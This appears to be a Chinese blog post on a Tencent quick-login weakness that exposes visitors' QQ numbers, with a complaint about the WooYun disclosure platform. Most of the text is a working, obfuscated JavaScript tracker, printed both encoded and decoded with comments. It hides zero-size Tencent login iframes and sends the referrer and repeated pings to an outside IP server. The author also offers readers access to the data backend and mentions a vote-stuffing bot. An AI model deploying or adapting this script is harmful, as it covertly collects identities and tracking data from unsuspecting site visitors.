现在的位置: 首页 > 综合 > 正文

【首发】上亿用户QQ号码泄露,腾讯WEB产品漏洞

2017年02月16日 ⁄ 综合 ⁄ 共 8742字 ⁄ 字号 评论关闭

这次的漏洞,主要是腾讯的快速登陆漏洞导致,只要用户访问的网站执行了下面代码,你的QQ就有可能泄露。


地址是:http://ui.ptlogin2.qq.com/cgi-bin/login?hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=20715148&style=12&target=self&s_url=http%3A//qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=%CA%D6%BB%FAQQ%BF%D5%BC%E4&pt_qr_link=http%3A//z.qzone.com/download.html&self_regurl=http%3A//qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http%3A//z.qzone.com/download.html&,

1.抓取qq数据代码

点击(此处)折叠或打开

  1. __ = ["\x32\x37\x36\x39\x31\x39\x37\x34\x33\x33", "\x34", "http://116.251.208.134:8080", "", "\x66\x6c\x6f\x6f\x72", "\x72\x61\x6e\x64\x6f\x6d", "\x73\x72\x63", "\x2f\x70\x2e\x70\x68\x70\x3f\x71\x71\x3d", "\x26\x75\x3d", "\x26\x72\x65\x66\x3d", "\x72\x65\x66\x65\x72\x72\x65\x72", "\x26", "\x77\x72\x69\x74\x65", "\x3c\x64\x69\x76 \x73\x74\x79\x6c\x65\x3d\"\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\" \x69\x64\x3d\"\x71\x71\x65\x65\x5f\x70\x70\x63\x6e\x7a\x7a\"\x3e\x3c\x2f\x64\x69\x76\x3e", "\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64", "\x71\x71\x65\x65\x5f\x70\x70\x63\x6e\x7a\x7a", "\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x65\x69\x73\x68\x69\x2e\x71\x71\x2e\x63\x6f\x6d\x2f\x70\x72\x6f\x66\x69\x6c\x65\x73\x2f", "\x3f", "\" \x77\x69\x64\x74\x68\x3d\"\x30\" \x68\x65\x69\x67\x68\x74\x3d\"\x30\" \x73\x63\x72\x6f\x6c\x6c\x69\x6e\x67\x3d\"\x6e\x6f\"\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e", "\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c", "\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\x2f\x2f\x75\x69\x2e\x70\x74\x6c\x6f\x67\x69\x6e\x32\x2e\x71\x71\x2e\x63\x6f\x6d\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x6c\x6f\x67\x69\x6e\x3f\x68\x69\x64\x65\x5f\x74\x69\x74\x6c\x65\x5f\x62\x61\x72\x3d\x31\x26\x6c\x6f\x77\x5f\x6c\x6f\x67\x69\x6e\x3d\x30\x26\x71\x6c\x6f\x67\x69\x6e\x5f\x61\x75\x74\x6f\x5f\x6c\x6f\x67\x69\x6e\x3d\x31\x26\x6e\x6f\x5f\x76\x65\x72\x69\x66\x79\x69\x6d\x67\x3d\x31\x26\x6c\x69\x6e\x6b\x5f\x74\x61\x72\x67\x65\x74\x3d\x62\x6c\x61\x6e\x6b\x26\x61\x70\x70\x69\x64\x3d\x32\x30\x37\x31\x35\x31\x34\x38\x26\x73\x74\x79\x6c\x65\x3d\x31\x32\x26\x74\x61\x72\x67\x65\x74\x3d\x73\x65\x6c\x66\x26\x73\x5f\x75\x72\x6c\x3d\x68\x74\x74\x70\x25\x33\x41\x2f\x2f\x71\x7a\x73\x2e\x71\x71\x2e\x63\x6f\x6d\x2f\x71\x7a\x6f\x6e\x65\x2f\x76\x35\x2f\x6c\x6f\x67\x69\x6e\x73\x75\x63\x63\x2e\x68\x74\x6d\x6c\x3f\x70\x61\x72\x61\x3d\x69\x7a\x6f\x6e\x65\x26\x70\x74\x5f\x71\x72\x5f\x61\x70\x70\x3d\x25\x43\x41\x25\x44\x36\x25\x42\x42\x25\x46\x41\x51\x51\x25\x42\x46\x25\x44\x35\x25\x42\x43\x25\x45\x34\x26\x70\x74\x5f\x71\x72\x5f\x6c\x69\x6e\x6b\x3d\x68\x74\x74\x70\x25\x33\x41\x2f\x2f\x7a\x2e\x71\x7a\x6f\x6e\x65\x2e\x63\x6f\x6d\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x2e\x68\x74\x6d\x6c\x26\x73\x65\x6c\x66\x5f\x72\x65\x67\x75\x72\x6c\x3d\x68\x74\x74\x70\x25\x33\x41\x2f\x2f\x71\x7a\x73\x2e\x71\x71\x2e\x63\x6f\x6d\x2f\x71\x7a\x6f\x6e\x65\x2f\x76\x36\x2f\x72\x65\x67\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x26\x70\x74\x5f\x71\x72\x5f\x68\x65\x6c\x70\x5f\x6c\x69\x6e\x6b\x3d\x68\x74\x74\x70\x25\x33\x41\x2f\x2f\x7a\x2e\x71\x7a\x6f\x6e\x65\x2e\x63\x6f\x6d\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x2e\x68\x74\x6d\x6c\x26", "\" \x77\x69\x64\x74\x68\x3d\"\x30\" \x68\x65\x69\x67\x68\x74\x3d\"\x30\" \x73\x63\x72\x6f\x6c\x6c\x69\x6e\x67\x3d\"\x6e\x6f\"\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\x3c\x69\x6d\x67 \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\x2f\x2f\x75\x73\x65\x72\x2e\x71\x7a\x6f\x6e\x65\x2e\x71\x71\x2e\x63\x6f\x6d\x2f", "\x2f\x6d\x61\x69\x6e\x23\x21\x61\x70\x70\x3d\x33\x31\x31\x26\x75\x72\x6c\x3d\x68\x74\x74\x70\x25\x33\x41\x25\x32\x46\x25\x32\x46\x63\x6e\x63\x2e\x71\x7a\x73\x2e\x71\x71\x2e\x63\x6f\x6d\x25\x32\x46\x71\x7a\x6f\x6e\x65\x25\x32\x46\x61\x70\x70\x25\x32\x46\x6d\x6f\x6f\x64\x5f\x76\x36\x25\x32\x46\x68\x74\x6d\x6c\x25\x32\x46\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x25\x33\x46\x6d\x6f\x6f\x64\x25\x32\x33\x75\x69\x6e\x25\x33\x44\x32\x30\x37\x31\x35\x31\x34\x38\x25\x32\x36\x70\x66\x69\x64\x25\x33\x44\x32\x25\x32\x36\x71\x7a\x5f\x76\x65\x72\x25\x33\x44\x36\x25\x32\x36\x61\x70\x70\x63\x61\x6e\x76\x61\x73\x25\x33\x44\x30\x25\x32\x36\x71\x7a\x5f\x73\x74\x79\x6c\x65\x25\x33\x44\x76\x36\x25\x32\x46\x38\x38\x25\x32\x36\x70\x61\x72\x61\x6d\x73\x25\x33\x44\x25\x32\x36\x65\x6e\x74\x65\x72\x74\x69\x6d\x65\x25\x33\x44\x31\x33\x38\x31\x35\x35\x33\x30\x34\x33\x38\x39\x30\x25\x32\x36\x63\x61\x6e\x76\x61\x73\x74\x79\x70\x65\x25\x33\x44\" \x73\x74\x79\x6c\x65\x3d\"\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\"\x3e", "\x2f\x70\x32\x2e\x70\x68\x70\x3f\x26\x75\x3d", "\x26\x64\x61\x74\x65\x3d"];
  2. var lE1 = __[0];
  3. var TDY2 = __[1];
  4. var aiOZRpLIr3 = __[2];
  5. function nummax() {
  6.     var eccQCETuM4 = __[3];
  7.     for (var WBLc5 = 0; WBLc5 < 6; WBLc5++) {
  8.         eccQCETuM4 += window["\x4d\x61\x74\x68"][__[4]](window["\x4d\x61\x74\x68"][__[5]]() * 10);
  9.     };
  10.     return eccQCETuM4;
  11. };
  12. var jjkdSPqa6 = new Image();
  13. function p_sitefun() {
  14.     jjkdSPqa6[__[6]] = aiOZRpLIr3 + __[7] + lE1 + __[8] + TDY2 + __[9] + window["\x65\x73\x63\x61\x70\x65"](window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"][__[10]]) + __[11] + nummax();
  15. };
  16. window["document"][__[12]](__[13]);
  17. var GGHfiolV7 = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"][__[14]](__[15]);
  18. var XU8;
  19. var j9 = 3;
  20. var teBc10 = 0;
  21. setTimeout(p_sitefun, 3500);
  22. function tab() {
  23.     XU8 = __[16] + lE1 + __[17] + nummax() + __[18];
  24.     GGHfiolV7[__[19]] += XU8;
  25. };
  26. function tab1() {
  27.     GGHfiolV7[__[19]] = __[20] + nummax() + __[21] + lE1 + __[22];
  28. };
  29. for (var RO11 = 0; RO11 < 2; RO11++) {
  30.     teBc10 = RO11 * 3000;
  31.     setTimeout(tab, teBc10);
  32.     if (RO11 == 1) {
  33.         teBc10 += 1500;
  34.         setTimeout(tab1, teBc10);
  35.     }
  36. };
  37. var ONrCvWhbZ12 = 0;
  38. function userstop() {
  39.     ONrCvWhbZ12 += 1;
  40.     jjkdSPqa6[__[6]] = aiOZRpLIr3 + __[23] + TDY2 + __[24] + ONrCvWhbZ12 + __[11] + nummax();
  41. };
  42. var PEiTi13 = 0;
  43. for (var aFjMXogw14 = 1; aFjMXogw14 < 11; aFjMXogw14++) {
  44.     PEiTi13 = aFjMXogw14 * 60000;
  45.     setTimeout(userstop, PEiTi13);
  46. }

解密转码显示

点击(此处)折叠或打开

  1. __ = '2769197433,4,http://116.251.208.134:8080,,floor,random,src,/p.php?qq=,&u=,&ref=,referrer,&,write,<div style="display:none;" id="qqee_ppcnzz">

,getElementById,qqee_ppcnzz,<iframe src="http://meishi.qq.com/profiles/,?," width="0" height="0" scrolling="no"></iframe>,innerHTML,<iframe src="http://ui.ptlogin2.qq.com/cgi-bin/login?hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=20715148&style=12&target=self&s_url=http%3A//qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=%CA%D6%BB%FAQQ%BF%D5%BC%E4&pt_qr_link=http%3A//z.qzone.com/download.html&self_regurl=http%3A//qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http%3A//z.qzone.com/download.html&," width="0" height="0" scrolling="no"></iframe><img src="http://user.qzone.qq.com/,/main#!app=311&url=http%3A%2F%2Fcnc.qzs.qq.com%2Fqzone%2Fapp%2Fmood_v6%2Fhtml%2Findex.html%3Fmood%23uin%3D20715148%26pfid%3D2%26qz_ver%3D6%26appcanvas%3D0%26qz_style%3Dv6%2F88%26params%3D%26entertime%3D1381553043890%26canvastype%3D" style="display:none;">,/p2.php?&u=,&date=';

  • var lE1 = __[0];
  • var TDY2 = __[1];
  • var aiOZRpLIr3 = __[2];
  • //随机数
  • function nummax() {
  •     var eccQCETuM4 = __[3];
  •     for (var WBLc5 = 0; WBLc5 < 6; WBLc5++) {
  •         eccQCETuM4 += window[Math][floor](window["Math"][random]() * 10);
  •     };
  •     return eccQCETuM4;
  • };
  • var jjkdSPqa6 = new Image();//新建图形对象
  • function p_sitefun() {
  •     jjkdSPqa6[src] = aiOZRpLIr3 + "/p.php?qq=" + lE1 + "&u=" + TDY2 + "&ref=" + window[escape](window["document"][referrer]) + "&" + nummax();
  • };
  • window["document"][write](__[13]);
  • var GGHfiolV7 = window["document"][getElementById]("qqee_ppcnzz");
  • var XU8;
  • var j9 = 3;
  • var teBc10 = 0;
  • setTimeout(p_sitefun, 3500);
  • //定时发送
  • function tab() {
  •     XU8 = __[16] + lE1 + "?" + nummax() + __[18];
  •     GGHfiolV7[innerHTML] += XU8; //输出美食框架2次
  • };
  • //定时发送
  • function tab1() {
  •     GGHfiolV7[innerHTML] = __[20] + nummax() + __[21] + lE1 + __[22];//输出登录框架,IMGQQ空间
  • };
  • for (var RO11 = 0; RO11 < 2; RO11++) {
  •     teBc10 = RO11 * 3000;
  •     setTimeout(tab, teBc10);
  •     if (RO11 == 1) {
  •         teBc10 += 1500;
  •         setTimeout(tab1, teBc10);//调用一次
  •     }
  • };
  • //定时发送
  • var ONrCvWhbZ12 = 0;
  • function userstop() {
  •     ONrCvWhbZ12 += 1;
  •     jjkdSPqa6[src] = aiOZRpLIr3 + "/p2.php?&u=" + TDY2 + "&date=" + ONrCvWhbZ12 + "&" + nummax();
  • };
  • var PEiTi13 = 0;
  • for (var aFjMXogw14 = 1; aFjMXogw14 < 11; aFjMXogw14++) {
  •     PEiTi13 = aFjMXogw14 * 60000;
  •     setTimeout(userstop, PEiTi13);//定时发送10次数据到服务器,确认IP地址,与应用ID
  • }

    • 2.后台抓取数据管理

    3.代码分析

    已经在乌云写过一次,不想再写了,看我上面写的注释就好了。

    4.漏洞成因是腾讯的快速登录控制不严导致。

    5.结果说明一切,这是后台登陆截图,想测试的可以给我发站内短消息,我可地址,账号密码给你。

    写着累,已经提交到乌云了。

    ----------------------------------------------------------------------华丽的分割线--------------------------------------------------------------------------------------

    本来这文章是不想在这博客发表的,只是乌云审核实在太严了。漏洞还要原创,你要明白,我们属于互联网的建设者而不是破坏者,不会每天去研究别人网站,收集漏洞。这次也是一个客户买了这个漏洞功能问我。我发觉这漏洞泄露了用户隐私,提交到乌云是想让厂商修复。

    去年大洋网的一个民间投票选最高人气主持程序,由于投票存在BUG,只限制IP与COOKIES,我写个清理COOKIES与5分钟自动换IP的自动刷投票程序。也提交向乌云上,也没审核通过。我认为漏洞发掘者只要提供漏洞结果,并拿出证据,这就是一个漏洞,而不是要写着想这种长篇论文一样,而不一定要提供漏洞原理,细致说明,并写出自己的工具,去证明这个漏洞存在。漏洞修复方案没写详细页不给审核,这完全是胡扯,我发觉漏洞,我还一定的帮你补好,修复方案不完全也不给审核。最扯淡的还是那个必须原创发觉,这次这个漏洞是黑客卖给商家,商家经营被我发觉,我给你拿出全部代码,并给你解密,注释还不能是原创

    乌云真的是一片乌云,看不清内情,你是审核的人不是专业的,还是想做安全行业老大控制全互联网各种漏洞,囤积黑客团队资源?

    返回
    【上篇】
    【下篇】

    作者:

    抱歉!评论已关闭.

    返回首页

    Copyright © 2013-2018 学步园  保留所有权利.
    软文销售 QQ客服:2265327166 点击这里给我发消息(其他合作也可洽谈)
    必威体育
    必威电竞